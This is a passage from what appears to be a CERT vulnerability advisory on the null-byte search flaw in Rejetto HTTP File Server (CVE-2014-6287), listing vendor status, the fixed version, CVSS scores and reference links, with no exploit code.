Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Rejetto __ Affected\n\nNotified: October 03, 2014 Updated: October 06, 2014 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * [httpNone.](<httpNone.>)\n\n### Addendum\n\nThis issue is addressed in HFS version 2.3c and later, [available here](<http://www.rejetto.com/hfs/?f=dl>).\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23251276 Feedback>).\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.5 | AV:N/AC:L/Au:N/C:P/I:P/A:P \nTemporal | 6.2 | E:F/RL:OF/RC:C \nEnvironmental | 4.6 | CDP:ND/TD:M/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://cwe.mitre.org/data/definitions/158.html>\n * <http://www.rejetto.com/hfs/>\n * <http://sourceforge.net/projects/hfs/>\n * <http://packetstormsecurity.com/files/128243/HttpFileServer-2.3.x-Remote-Command-Execution.html>\n * <https://github.com/rapid7/metasploit-framework/pull/3793>\n\n### Acknowledgements\n\nThis document was written by Joel Land.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2014-6287](<http://web.nvd.nist.gov/vuln/detail/CVE-2014-6287>) \n---|--- \n**Date Public:** | 2014-09-11 \n**Date First Published:** | 2014-10-06 \n**Date Last Updated: ** | 2014-10-06 19:16 UTC \n**Document Revision: ** | 14 \n", "modified": "2014-10-06T19:16:00", "published": "2014-10-06T00:00:00", "id": "VU:251276", "href": "https://www.kb.cert.org/vuls/id/251276", "type": "cert", "title": "Rejetto HTTP File Server (HFS) search feature fails to handle null bytes", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}